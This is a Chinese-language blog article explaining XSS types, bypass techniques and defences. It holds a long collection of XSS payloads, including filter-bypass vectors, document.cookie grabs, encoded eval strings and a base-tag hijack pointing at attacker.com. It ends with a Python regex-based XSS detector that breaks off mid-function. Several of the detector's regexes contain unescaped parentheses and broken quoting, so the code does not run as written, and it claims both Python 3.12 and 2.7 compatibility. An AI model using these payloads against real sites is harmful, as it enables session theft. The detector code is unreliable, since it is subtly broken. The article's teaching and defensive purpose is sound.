浅析XSS原理与分类——含payload合集和检测与防护思路XSS 跨站脚本（XSS）是Web安全领域最古老、最普遍的漏

XSS

跨站脚本（XSS）是Web安全领域最古老、最普遍的漏洞之一。其核心本质是数据与代码边界的混淆：攻击者将恶意脚本（通常是JavaScript）作为数据注入到Web应用中，当浏览器渲染页面时，这些数据被当作代码执行，从而导致信息泄露、会话劫持等后果。

一、原理与分类

XSS的根源在于不可信数据被未经过滤地注入了HTML/JS上下文。

1. 反射型 XSS

特点：非持久化，恶意脚本通过URL参数、表单提交等方式发送给服务器，服务器将脚本“反射”回响应页面中。
触发：需要诱导用户点击恶意链接（通常结合钓鱼或短链接）。
示例：
```
// 危险代码
echo "欢迎: " . $_GET['name'];
```
若 name=<script>alert(1)</script>，则脚本直接执行。

2. 存储型 XSS

特点：持久化，恶意脚本被存储在后端（数据库、文件系统等），当其他用户访问正常页面时，脚本被加载执行。
危害：影响范围广，常见于评论区、个人信息、帖子等场景。
示例：攻击者在留言板提交 <script>stealCookie()</script>，所有浏览留言的用户都会中招。

3. DOM型 XSS

特点：完全在前端发生，不经过服务器后端逻辑。通过修改页面DOM环境（如 location.hash、document.referrer、innerHTML 等）注入恶意脚本。
区别：服务器响应与正常页面无异，恶意代码在客户端本地执行。

示例：

// 危险代码
var hash = location.hash.slice(1);
document.getElementById("output").innerHTML = hash;

访问 page.html#<img src=x onerror=alert(1)> 即可触发。

二、绕过姿势（进阶技巧）

防御机制（如输入过滤、输出编码、CSP）不断演进，攻击者也总结出大量绕过手法。以下列举经典及现代绕过思路：

1. 上下文感知绕过

HTML标签内：当输出点在标签属性（如 <input value="...">）时，可提前闭合引号并注入新事件：
```
" onmouseover="alert(1)
```
JavaScript代码中：如果输出在 <script> 标签内，需考虑闭合字符串或利用模板字符串：
```
var name = '用户输入'; // 若输入 ';alert(1);// 则逃逸
```

2. 编码绕过

HTML实体编码：某些过滤仅检查 < 和 >，但浏览器在解析HTML属性时会先解码实体：
```
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;(1)">
```
Unicode/URL编码：在 javascript: 伪协议或 data: 中使用。
多重编码：针对递归解码的过滤器，使用两次URL编码。

3. 事件与伪协议滥用

HTML5新事件：onload、onerror、onfocus、onpointermove 等。

伪协议：

<a href="javascript:alert(1)">click</a>
<iframe src="javascript:alert(1)">

<svg> 与 <math> 标签：这些标签内部允许脚本且对过滤较宽松：
```
<svg><script>alert(1)</script>
```

4. 过滤检测对抗

大小写混合：<ScRiPt> 绕过黑名单。
双写：<scr<script>ipt> 当过滤仅删除一次时。
利用换行与空格：<script \n src="..."> 某些正则可能遗漏。
字符截断：使用 %00、/ 或 Unicode 控制字符干扰正则匹配。

5. 利用浏览器特性

<base> 标签：改变页面相对URL，可劫持资源加载。
<link> 与 @import：加载外部样式表，结合 expression（IE旧版）或 behavior。
<template> 与 <iframe> ：绕过某些基于AST的XSS过滤器。

6. 基于DOM的独特向量

document.write 与 innerHTML 的二次注入。
window.name、postMessage 跨域传递恶意数据。
localStorage/sessionStorage 中存储的未过滤数据。

7. 借助CSP绕过

如果CSP使用 unsafe-inline 或允许 data:、blob:，可利用：
```
<a href="data:text/html,<script>alert(1)</script>">click</a>
```
CSP策略配置不当：如允许 *.cdn.com，攻击者可上传恶意脚本到CDN。

三、防御体系（纵深防御）

防御XSS必须遵循“输出编码”为根本，结合多层安全机制。

1. 核心原则：上下文感知输出编码

HTML实体编码：将 <、>、"、'、& 等转换为 < 等，用于HTML标签体。
HTML属性编码：对属性值内的特殊字符编码（尤其注意引号）。
JavaScript字符串编码：对 ``、'、"、\n 等转义，确保用户数据不会逃逸出字符串。
URL编码：对URL参数值进行编码，避免 javascript: 伪协议注入。
CSS编码：对 style 属性内用户输入进行严格过滤或编码。

推荐：使用成熟的模板引擎（如React的JSX、Vue的模板、Jinja2），它们默认对输出进行上下文编码。

2. 输入过滤（辅助手段）

严格白名单：对于富文本，使用经过安全测试的库（如DOMPurify）进行清洗，仅允许安全的标签和属性。
类型校验：如年龄字段必须是数字，邮箱必须符合格式。

注意：输入过滤不能作为主要防御，因为业务可能需要保留特殊字符，且过滤逻辑复杂易出错。

3. 安全头部分

CSP (Content Security Policy) ：
配置 Content-Security-Policy 头，禁用 unsafe-inline 和 unsafe-eval，使用nonce或hash机制白名单内联脚本。
```
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com 'nonce-随机值'
```
HttpOnly：设置Cookie的 HttpOnly 属性，使恶意脚本无法通过 document.cookie 读取会话令牌。
X-XSS-Protection（已废弃，但部分老旧浏览器仍有）：X-XSS-Protection: 1; mode=block，作为纵深防御一层。

4. 其他实践

使用现代框架：React、Vue、Angular等默认会对插值内容进行转义，避免直接操作DOM（v-html、dangerouslySetInnerHTML 需谨慎）。
避免将用户内容放入动态执行的JavaScript：如 eval()、setTimeout(someUserInput)、Function() 构造函数。
Cookie安全：关键Cookie应设置 Secure、SameSite=Strict 或 Lax 属性。

四、payload合集

'level1.php?name=<img src=1 onerror=alert(1)>
"><scrscriptipt>alert(1)</scrscriptipt>
<svg%0Aonload=alert(1)>
?arg01=a&arg02=b onmousemove='alert(1)'
?arg01=a&arg02=b onclick='alert(1)'
"><a HrEf=javascript:alert(1)>
"><a href=javascript:alert(1)>
' onclick='alert(1)
" onclick="alert(1)
"><script>alert(1)</script>

<script>alert(1)</script>
<svg οnlοad=alert(1)>
<img src=x onerror=alert(1)>
<a herf=javascript:alert(1)>
<iframe src="javascript:alert(1)"></iframe>

<script>alert(document.cookie)</script>
<script>prompt(document.cookie)</script>
<script>confirm(/xss/)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;       //Unicode码  还有十六进制 URL编码 JS编码 HTML实体编码等等
<script>alert/*dsa*/(1)</script>   //绕过黑名单
<script>(alert)(1)</script>        //绕过黑名单
<svg onload="alert(1)">  
<body onload="alert('xss')">    //过滤 script时
"><svg/onload=alert(1)
<svg onmousemove="alert(1)">
<IMG SRC="" onerror="alert('XSS')">
<IMG SRC="" onerror="javascript:alert('XSS');">

<input value="1" autofocus onfocus=alert(1)  x="">   //过滤 script时
<iframe src="javascript:alert(1)"></iframe>      //过滤 script时
<input name="name" value=”” onmousemove=prompt(document.cookie) >
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<input type = "button"  value ="clickme" onclick="alert('click me')" />


制表符 绕过滤器的
<IMG SRC="" onerror="jav&#x9ascript:alert('XSS');">
1.<iframe src=javascript:alert(1)></iframe> //Tab
2.<iframe src=javascript:alert(1)></iframe> //回车
3.<iframe src=javascript:alert(1)></iframe> //换行
4.<iframe src=javascript:alert(1)></iframe> //编码冒号
5.<iframe src=javascript:alert(1)></iframe> //HTML5 新增的实体命名编码，IE6、7下不支持
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>
"><img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))">

<script>onerror=alert;throw document.cookie</script>
<script>{onerror=alert}throw 1337</script>         //过滤 单引号，双引号，小括号时   没过滤script
<a href="" onclick="alert(1111)">
' οnclick=alert(1111) '   //鼠标点击事件执行JavaScript语句

<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>

<script src="/api/jsonp?callback=alert(1)"></script>
<base href="https://attacker.com/">
<script src="/jquery.js"></script>
<link rel="preload" as="script"href="data:;base64,YWxlcnQoMSk="onload="eval(this.href.split(',')[1])">
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
navigator.serviceWorker.register('/sw.js?script=alert(1)')

自动化扫描：使用工具如Burp Suite、OWASP ZAP、XSStrike进行初步探测。
手动测试：针对每个输入点，尝试注入不同上下文的payload（HTML、属性、JS、URL、CSS）。
代码审计：重点关注 innerHTML、document.write、eval、setTimeout 等危险函数，以及后台未编码的输出点。

五、检测与防护思路

维度	关键点
原理	数据被解释为代码（HTML/JS上下文混淆）
分类	反射型、存储型、DOM型（根据持久性与触发方式）
绕过	上下文逃逸、编码混淆、过滤绕过、浏览器特性滥用、CSP配置缺陷
防御	上下文输出编码（核心）+ CSP + HttpOnly + 输入白名单 + 安全框架

XSS本质上是信任问题：永远不要信任用户输入，也永远不要信任外部数据。通过“输出编码”将数据与代码彻底分离，再辅以纵深防御策略，可以有效将XSS风险降至最低。随着Web标准演进，CSP已成为现代Web应用对抗XSS的强有力武器，建议所有新项目默认启用严格的CSP策略。

下面基于规则匹配和语义分析利用CC等Agent写的检测与防护脚本，运行环境为Python 3.12。

检测脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
XSS (Cross-Site Scripting) Detection and Protection System
Based on rule matching and semantic analysis principles
Compatible with Python 2.7+

Author: Security Tool
Version: 1.0.0
"""

from __future__ import print_function


class RiskLevel:
    """Risk level enumeration for XSS threats"""
    SAFE = "safe"
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"
    CRITICAL = "critical"


class DetectionResult:
    """Result of XSS detection analysis"""
    def __init__(self, is_xss, risk_level, matched_patterns, attack_types,
                 analysis_details, recommendations, sanitized_input=None):
        self.is_xss = is_xss
        self.risk_level = risk_level
        self.matched_patterns = matched_patterns
        self.attack_types = attack_types
        self.analysis_details = analysis_details
        self.recommendations = recommendations
        self.sanitized_input = sanitized_input


class XSSDetector:
    """
    XSS Detector based on rule matching and semantic analysis
    """
    
    XSS_ATTACK_TYPES = {
        "reflected": {"name": "Reflected XSS", "description": "Direct reflection of unsanitized input", "severity": RiskLevel.HIGH},
        "stored": {"name": "Stored XSS", "description": "Malicious script stored in database", "severity": RiskLevel.CRITICAL},
        "dom": {"name": "DOM-based XSS", "description": "Client-side DOM manipulation", "severity": RiskLevel.HIGH},
        "vector": {"name": "XSS Vector", "description": "Common XSS attack vector", "severity": RiskLevel.HIGH},
        "bypass": {"name": "Filter Bypass", "description": "Attempting to bypass security filters", "severity": RiskLevel.CRITICAL},
    }

    def __init__(self):
        self.rules = self._init_detection_rules()
        self.dangerous_tags = self._init_dangerous_tags()
        self.dangerous_attributes = self._init_dangerous_attributes()
        self.javascript_protocols = self._init_javascript_protocols()

    def _init_detection_rules(self):
        """Initialize XSS detection rules with patterns"""
        return [
            {
                'name': 'Script Tag Injection',
                'pattern': r'<script[^>]*>.*?</script>',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Direct script tag injection',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'Script Tag Self-Closing',
                'pattern': r'<script[^>]*/?>',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Self-closing script tag',
                'case_insensitive': True
            },
            {
                'name': 'Event Handler on*',
                'pattern': r'\bon\w+\s*=',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Event handler attribute injection (onclick, onload, etc.)',
                'case_insensitive': True
            },
            {
                'name': 'Event Handler JavaScript',
                'pattern': r'<[^>]+\s+on\w+\s*=\s*["']?javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Event handler with javascript: protocol',
                'case_insensitive': True
            },
            {
                'name': 'JavaScript Protocol',
                'pattern': r'javascript\s*:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'JavaScript protocol handler',
                'case_insensitive': True
            },
            {
                'name': 'JavaScript Protocol in href',
                'pattern': r'href\s*=\s*["']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'JavaScript protocol in href attribute',
                'case_insensitive': True
            },
            {
                'name': 'Data URI Scheme',
                'pattern': r'data\s*:\s*text/html',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Data URI with HTML content',
                'case_insensitive': True
            },
            {
                'name': 'Iframe Injection',
                'pattern': r'<iframe[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Iframe tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Iframe with JavaScript',
                'pattern': r'<iframe[^>]*src\s*=\s*["']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Iframe with javascript: source',
                'case_insensitive': True
            },
            {
                'name': 'Object Tag',
                'pattern': r'<object[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Object tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Embed Tag',
                'pattern': r'<embed[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Embed tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Applet Tag',
                'pattern': r'<applet[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Java applet injection',
                'case_insensitive': True
            },
            {
                'name': 'Form Action Injection',
                'pattern': r'<form[^>]*action\s*=\s*["']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Form with javascript: action',
                'case_insensitive': True
            },
            {
                'name': 'Body onload Event',
                'pattern': r'<body[^>]*onload\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Body onload event handler',
                'case_insensitive': True
            },
            {
                'name': 'Meta Refresh Redirect',
                'pattern': r'<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']?\s*\d+\s*;\s*url\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Meta refresh with URL redirect',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'Link Import',
                'pattern': r'<link[^>]*rel\s*=\s*["']?\s*import["']?',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Link tag with import',
                'case_insensitive': True
            },
            {
                'name': 'SVG with Script',
                'pattern': r'<svg[^>]*>.*?<script',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'SVG with embedded script',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'SVG onload Event',
                'pattern': r'<svg[^>]*on\w+\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'SVG with event handler',
                'case_insensitive': True
            },
            {
                'name': 'IE Expression',
                'pattern': r'expression\s*(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'IE CSS expression',
                'case_insensitive': True
            },
            {
                'name': 'VBScript Protocol',
                'pattern': r'vbscript\s*:',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'VBScript protocol handler',
                'case_insensitive': True
            },
            {
                'name': 'Angular Binding',
                'pattern': r'{{.*?}}',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'vector',
                'description': 'Angular template binding',
                'case_insensitive': False
            },
            {
                'name': 'Angular ng-',
                'pattern': r'ng-\w+',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'vector',
                'description': 'Angular directive',
                'case_insensitive': True
            },
            {
                'name': 'HTML Entity Encoding',
                'pattern': r'&#\d+;|&#x[0-9a-fA-F]+;',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'HTML entity encoding attempt',
                'case_insensitive': True
            },
            {
                'name': 'Null Byte Injection',
                'pattern': r'\x00|%00',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'Null byte injection attempt',
                'case_insensitive': False
            },
            {
                'name': 'Unicode Escape',
                'pattern': r'\u[0-9a-fA-F]{4}',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'Unicode escape sequence',
                'case_insensitive': True
            },
            {
                'name': 'CSS Expression',
                'pattern': r'url\s*(\s*["']?\s*javascript:',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'CSS URL with javascript:',
                'case_insensitive': True
            },
            {
                'name': 'Base Tag',
                'pattern': r'<base[^>]*href\s*=\s*["']?',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Base tag for relative URL hijacking',
                'case_insensitive': True
            },
            {
                'name': 'SVG use',
                'pattern': r'<use[^>]*href\s*=\s*["']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'SVG use with javascript: href',
                'case_insensitive': True
            },
            {
                'name': 'Animation Event',
                'pattern': r'onanimation\w+\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'CSS animation event handler',
                'case_insensitive': True
            },
            {
                'name': 'Cookie Access',
                'pattern': r'document.cookie',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Document cookie access',
                'case_insensitive': True
            },
            {
                'name': 'LocalStorage Access',
                'pattern': r'localStorage|sessionStorage',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Web storage access',
                'case_insensitive': True
            },
            {
                'name': 'InnerHTML Assignment',
                'pattern': r'innerHTML\s*=|innerHTML\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'innerHTML DOM manipulation',
                'case_insensitive': True
            },
            {
                'name': 'Document Write',
                'pattern': r'document.write\s*(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'document.write usage',
                'case_insensitive': True
            },
            {
                'name': 'Eval Usage',
                'pattern': r'\beval\s*(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'eval() function usage',
                'case_insensitive': True
            },
            {
                'name': 'Location Assignment',
                'pattern': r'location.(href|replace|assign)\s*=\s*["']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Location with javascript: protocol',
                'case_insensitive': True
            },
            {
                'name': 'Alert Pattern',
                'pattern': r'alert\s*(\s*['"]?\s*)',
                'risk': RiskLevel.LOW,
                'attack_type': 'vector',
                'description': 'Common XSS test pattern',
                'case_insensitive': True
            },
            {
                'name': 'Img onerror',
                'pattern': r'<img[^>]*onerror\s*=',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Image onerror event handler',
                'case_insensitive': True
            },
            {
                'name': 'Img src',
                'pattern': r'<img[^>]*src\s*=\s*["']?\s*(javascript:|data:)',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Image with dangerous src',
                'case_insensitive': True
            },
            {
                'name': 'Video onerror',
                'pattern': r'<(video|audio)[^>]*onerror\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Video/audio onerror event',
                'case_insensitive': True
            },
        ]

    def _init_dangerous_tags(self):
        """Initialize list of dangerous HTML tags"""
        return [
            'script', 'iframe', 'object', 'embed', 'applet', 'form',
            'input', 'button', 'select', 'textarea', 'isindex',
            'link', 'base', 'meta', 'head', 'body', 'svg', 'math',
            'video', 'audio', 'source', 'track', 'canvas', 'map',
            'area', 'param', 'bgsound', 'blink', 'comment', 'listing',
            'marquee', 'xmp', 'plaintext', 'noembed', 'noscript'
        ]

    def _init_dangerous_attributes(self):
        """Initialize list of dangerous HTML attributes"""
        return [
            'onclick', 'ondblclick', 'onmousedown', 'onmouseup', 'onmouseover',
            'onmousemove', 'onmouseout', 'onkeydown', 'onkeypress', 'onkeyup',
            'onload', 'onunload', 'onfocus', 'onblur', 'onsubmit', 'onreset',
            'onselect', 'onchange', 'onerror', 'onabort', 'onresize',
            'onscroll', 'oncontextmenu', 'onmouseenter', 'onmouseleave',
            'onfocusin', 'onfocusout', 'onanimationstart', 'onanimationend',
            'onanimationiteration', 'ontransitionend'
        ]

    def _init_javascript_protocols(self):
        """Initialize list of dangerous protocols"""
        return [
            'javascript:', 'vbscript:', 'data:', 'mocha:', 'livescript:',
            'expression:', 'behavior:', 'x-script:'
        ]

    def detect(self, user_input, context="general"):
        """
        Main detection method - analyzes input for XSS threats
        
        Args:
            user_input: The input string to analyze
            context: The context where input will be used (general, html, js, url, etc.)
            
        Returns:
            DetectionResult with analysis details
        """
        import re
        
        matched_rules = []
        attack_types = []
        risk_levels = []
        
        for rule in self.rules:
            pattern = rule['pattern']
            flags = re.IGNORECASE if rule.get('case_insensitive') else 0
            if rule.get('dotall'):
                flags |= re.DOTALL
                
            if re.search(pattern, user_input, flags):
                matched_rules.append({
                    'name': rule['name'],
                    'description': rule['description'],
                    'risk': rule['risk'],
                    'attack_type': rule['attack_type']
                })
                risk_levels.append(rule['risk'])
                
                if rule['attack_type'] not in attack_types:
                    attack_types.append(rule['attack_type'])

        semantic_analysis = self._semantic_analysis(user_input, context)
        matched_rules.extend(semantic_analysis['additional_rules'])
        risk_levels.extend(semantic_analysis['additional_risks'])
        
        if semantic_analysis['attack_types']:
            attack_types.extend(semantic_analysis['attack_types'])

        final_risk = self._calculate_final_risk(risk_levels)
        is_xss = len(matched_rules) > 0 or final_risk != RiskLevel.SAFE

        recommendations = self._generate_recommendations(
            matched_rules, 
            semantic_analysis,
            context
        )

        return DetectionResult(
            is_xss=is_xss,
            risk_level=final_risk,
            matched_patterns=[r['name'] for r in matched_rules],
            attack_types=list(set(attack_types)),
            analysis_details=self._generate_analysis_report(
                matched_rules, 
                semantic_analysis,
                context
            ),
            recommendations=recommendations,
            sanitized_input=None
        )

    def _semantic_analysis(self, user_input, context):
        """Perform semantic analysis on the input"""
        import re
        
        additional_rules = []
        additional_risks = []
        detected_attack_types = []
        details = {}

        if self._has_unbalanced_tags(user_input):
            additional_rules.append({
                'name': 'Unbalanced HTML Tags',
                'description': 'Detected potentially malicious unbalanced tags',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.MEDIUM)
            detected_attack_types.append('bypass')

        dangerous_tag_analysis = self._analyze_dangerous_tags(user_input)
        if dangerous_tag_analysis['found']:
            additional_rules.append({
                'name': 'Dangerous Tag Usage',
                'description': "Found dangerous tags: %s" % ", ".join(dangerous_tag_analysis['tags'][:5]),
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector'
            })
            additional_risks.append(RiskLevel.HIGH)
            detected_attack_types.append('vector')

        event_handler_analysis = self._analyze_event_handlers(user_input)
        if event_handler_analysis['found']:
            additional_rules.append({
                'name': 'Event Handler Detection',
                'description': "Found event handlers: %s" % ", ".join(event_handler_analysis['handlers'][:5]),
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector'
            })
            additional_risks.append(RiskLevel.CRITICAL)
            detected_attack_types.append('vector')

        protocol_analysis = self._analyze_protocols(user_input)
        if protocol_analysis['found']:
            additional_rules.append({
                'name': 'Dangerous Protocol Handler',
                'description': "Found dangerous protocols: %s" % ", ".join(protocol_analysis['protocols']),
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.CRITICAL)
            detected_attack_types.append('bypass')

        encoding_analysis = self._analyze_encoding(user_input)
        if encoding_analysis['found']:
            additional_rules.append({
                'name': 'Encoding Obfuscation',
                'description': "Found encoding: %s" % ", ".join(encoding_analysis['types']),
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.MEDIUM)
            detected_attack_types.append('bypass')

        if context == "js":
            js_context_analysis = self._analyze_js_context(user_input)
            additional_rules.extend(js_context_analysis['rules'])
            additional_risks.extend(js_context_analysis['risks'])
            
        elif context == "url":
            url_context_analysis = self._analyze_url_context(user_input)
            additional_rules.extend(url_context_analysis['rules'])
            additional_risks.extend(url_context_analysis['risks'])

        dom_analysis = self._analyze_dom_patterns(user_input)
        if dom_analysis['found']:
            additional_rules.append({
                'name': 'DOM Manipulation Pattern',
                'description': 'Found potential DOM manipulation',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom'
            })
            additional_risks.append(RiskLevel.HIGH)
            detected_attack_types.append('dom')

        return {
            'additional_rules': additional_rules,
            'additional_risks': additional_risks,
            'attack_types': detected_attack_types,
            'details': details
        }

    def _has_unbalanced_tags(self, text):
        """Check for unbalanced HTML tags"""
        import re
        tag_pattern = r'<(/?)([\w]+)[^>]*>'
        tags = re.findall(tag_pattern, text, re.IGNORECASE)
        
        open_tags = []
        for is_closing, tag_name in tags:
            tag_name = tag_name.lower()
            if is_closing:
                if tag_name in open_tags:
                    open_tags.remove(tag_name)
            else:
                if tag_name in self.dangerous_tags:
                    if not tag_name.startswith('!'):
                        open_tags.append(tag_name)
        
        return len(open_tags) > 0

    def _analyze_dangerous_tags(self, text):
        """Analyze dangerous HTML tag usage"""
        import re
        found_tags = []
        
        for tag in self.dangerous_tags:
            pattern = r'<\s*' + tag + r'[\s>]'
            if re.search(pattern, text, re.IGNORECASE):
                found_tags.append(tag)
        
        return {
            'found': len(found_tags) > 0,
            'tags': found_tags
        }

    def _analyze_event_handlers(self, text):
        """Analyze event handler usage"""
        import re
        found_handlers = []
        
        for handler in self.dangerous_attributes:
            pattern = r'\b' + handler + r'\s*='
            if re.search(pattern, text, re.IGNORECASE):
                found_handlers.append(handler)
        
        return {
            'found': len(found_handlers) > 0,
            'handlers': found_handlers[:5]
        }

    def _analyze_protocols(self, text):
        """Analyze dangerous protocol handlers"""
        found_protocols = []
        
        for protocol in self.javascript_protocols:
            if protocol in text.lower():
                found_protocols.append(protocol)
        
        return {
            'found': len(found_protocols) > 0,
            'protocols': found_protocols
        }

    def _analyze_encoding(self, text):
        """Analyze encoding attempts"""
        import re
        encoding_types = []
        
        if re.search(r'&#\d+;|&#x[0-9a-fA-F]+;', text):
            encoding_types.append('HTML Entity')
        
        if re.search(r'%[0-9a-fA-F]{2}', text):
            encoding_types.append('URL')
        
        if re.search(r'\u[0-9a-fA-F]{4}', text):
            encoding_types.append('Unicode')
        
        return {
            'found': len(encoding_types) > 0,
            'types': encoding_types
        }

    def _analyze_js_context(self, text):
        """Analyze JavaScript context vulnerabilities"""
        import re
        rules = []
        risks = []
        
        if '+' in text or 'eval' in text.lower():
            rules.append({
                'name': 'JS String Manipulation',
                'description': 'Potential JS injection through string manipulation',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom'
            })
            risks.append(RiskLevel.HIGH)
        
        return {'rules': rules, 'risks': risks}

    def _analyze_url_context(self, text):
        """Analyze URL context vulnerabilities"""
        rules = []
        risks = []
        
        if 'javascript:' in text.lower():
            rules.append({
                'name': 'JavaScript in URL',
                'description': 'JavaScript protocol in URL context',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass'
            })
            risks.append(RiskLevel.CRITICAL)
        
        return {'rules': rules, 'risks': risks}

    def _analyze_dom_patterns(self, text):
        """Analyze DOM manipulation patterns"""
        import re
        dom_patterns = [
            r'innerHTML\s*=',
            r'outerHTML\s*=',
            r'document.write',
            r'\beval\s*(',
            r'setTimeout\s*(\s*["']',
            r'setInterval\s*(\s*["']',
        ]
        
        found = False
        for pattern in dom_patterns:
            if re.search(pattern, text, re.IGNORECASE):
                found = True
                break
        
        return {'found': found}

    def _calculate_final_risk(self, risk_levels):
        """Calculate the final risk level from multiple detections"""
        if not risk_levels:
            return RiskLevel.SAFE
        
        risk_order = [
            RiskLevel.CRITICAL,
            RiskLevel.HIGH,
            RiskLevel.MEDIUM,
            RiskLevel.LOW,
            RiskLevel.SAFE
        ]
        
        for risk in risk_order:
            if risk in risk_levels:
                return risk
        
        return RiskLevel.SAFE

    def _generate_recommendations(self, matched_rules, semantic_analysis, context):
        """Generate security recommendations"""
        recommendations = []

        recommendations.append("Use context-aware output encoding (HTML, JavaScript, URL)")
        recommendations.append("Use Content Security Policy (CSP) headers")

        if context == "html":
            recommendations.append("Sanitize HTML using a trusted library (DOMPurify, Bleach)")
            recommendations.append("Use DOMPurify for HTML sanitization")
            
        elif context == "js":
            recommendations.append("Use JSON.parse() instead of eval()")
            recommendations.append("Avoid innerHTML, use textContent or safe DOM APIs")
            
        elif context == "url":
            recommendations.append("Validate and sanitize all URL parameters")
            recommendations.append("Use URL validation and whitelist allowed protocols")

        attack_types = set()
        for rule in matched_rules:
            if 'attack_type' in rule:
                attack_types.add(rule['attack_type'])
        
        if 'vector' in attack_types:
            recommendations.append("Remove or neutralize all HTML tags")
            recommendations.append("Strip dangerous attributes like event handlers")
            
        if 'bypass' in attack_types:
            recommendations.append("Decode and re-encode input to neutralize obfuscation")
            recommendations.append("Implement multiple layers of validation")
            
        if 'dom' in attack_types:
            recommendations.append("Use safe DOM APIs (textContent, setAttribute)")
            recommendations.append("Avoid using eval() and similar functions")
            recommendations.append("Use DOMPurify for DOM-based XSS prevention")

        critical_rules = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
        if critical_rules:
            recommendations.append("URGENT: Review and fix input validation immediately")
            recommendations.append("Implement input whitelist validation")
            recommendations.append("Enable CSP with strict policy")

        seen = set()
        unique_recommendations = []
        for rec in recommendations:
            if rec not in seen:
                seen.add(rec)
                unique_recommendations.append(rec)
        
        return unique_recommendations

    def _generate_analysis_report(self, matched_rules, semantic_analysis, context):
        """Generate detailed analysis report"""
        parts = []
        
        parts.append("Context: %s" % context)
        
        if matched_rules:
            critical = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
            high = [r for r in matched_rules if r['risk'] == RiskLevel.HIGH]
            medium = [r for r in matched_rules if r['risk'] == RiskLevel.MEDIUM]
            low = [r for r in matched_rules if r['risk'] == RiskLevel.LOW]
            
            parts.append("\nRule-based Detection: %d patterns matched" % len(matched_rules))
            
            if critical:
                parts.append("  CRITICAL (%d): %s" % (len(critical), ", ".join([r['name'] for r in critical[:3]])))
            if high:
